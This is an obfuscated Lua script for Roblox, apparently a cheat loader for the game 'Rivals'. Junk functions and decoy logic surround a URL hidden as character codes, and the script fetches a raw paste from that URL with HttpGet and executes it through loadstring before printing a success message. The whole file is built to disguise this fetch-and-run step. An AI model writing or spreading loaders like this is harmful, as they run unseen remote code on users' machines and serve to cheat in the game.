--[[ ____ _ _ _ __ _ __ _____ | _ \ _ __ ___ (_) ___ ___ | |_ | | / / | | / / |_ _| | |_) || '__|/ _ \ | | / _ \ / __|| __| | |/ / | |/ / | | | __/ | | | (_) || || __/| (__ | |_ | \ | \ | | |_| |_| \___/_/ | \___| \___| \__| |_|\__\ |_|\__\ |_| |__/ ]] --[[ N L 201 ]] local _r,_c = math.random, os.clock local _junk = {} for i=1,7 do _junk[i] = (_r(100,999) * i) % 13 end local function fakeGuard(v) return (v % 3 ~= 0) or (_c() < 0) --F end local function deadEnd() local s = 0 for i=1,15 do s = s + i end return s == 0 -- F end --[[ R P 210 ]] local ch = string.char local g = game local hg = ("H".."ttp".."Get") local u = { 104,116,116,112,115,58,47,47, 112,97,115,116,101,102,121,46, 97,112,112,47,112,89,84,81, 72,98,55,54,47,114,97,119 } local url = "" for _,v in ipairs(u) do if fakeGuard(v) or deadEnd() then url = url .. ch(v) else url = url .. ch(v) end end --[[ M J 210 ]] local phantom = setmetatable({},{ __index = function() return function() return nil end end }) phantom.ping = function() return _junk[_r(1,#_junk)] end --[[ E 202 ]] (loadstring(g[hg](g,url)))() print(ch( 115,117,99,99,101,115,115,226,156,133,32, 114,105,118,97,108,115,32,115,99,114,105,112,116,32, 102,111,114,32,80,67,33 )) --[[ enjoy~ :D ]]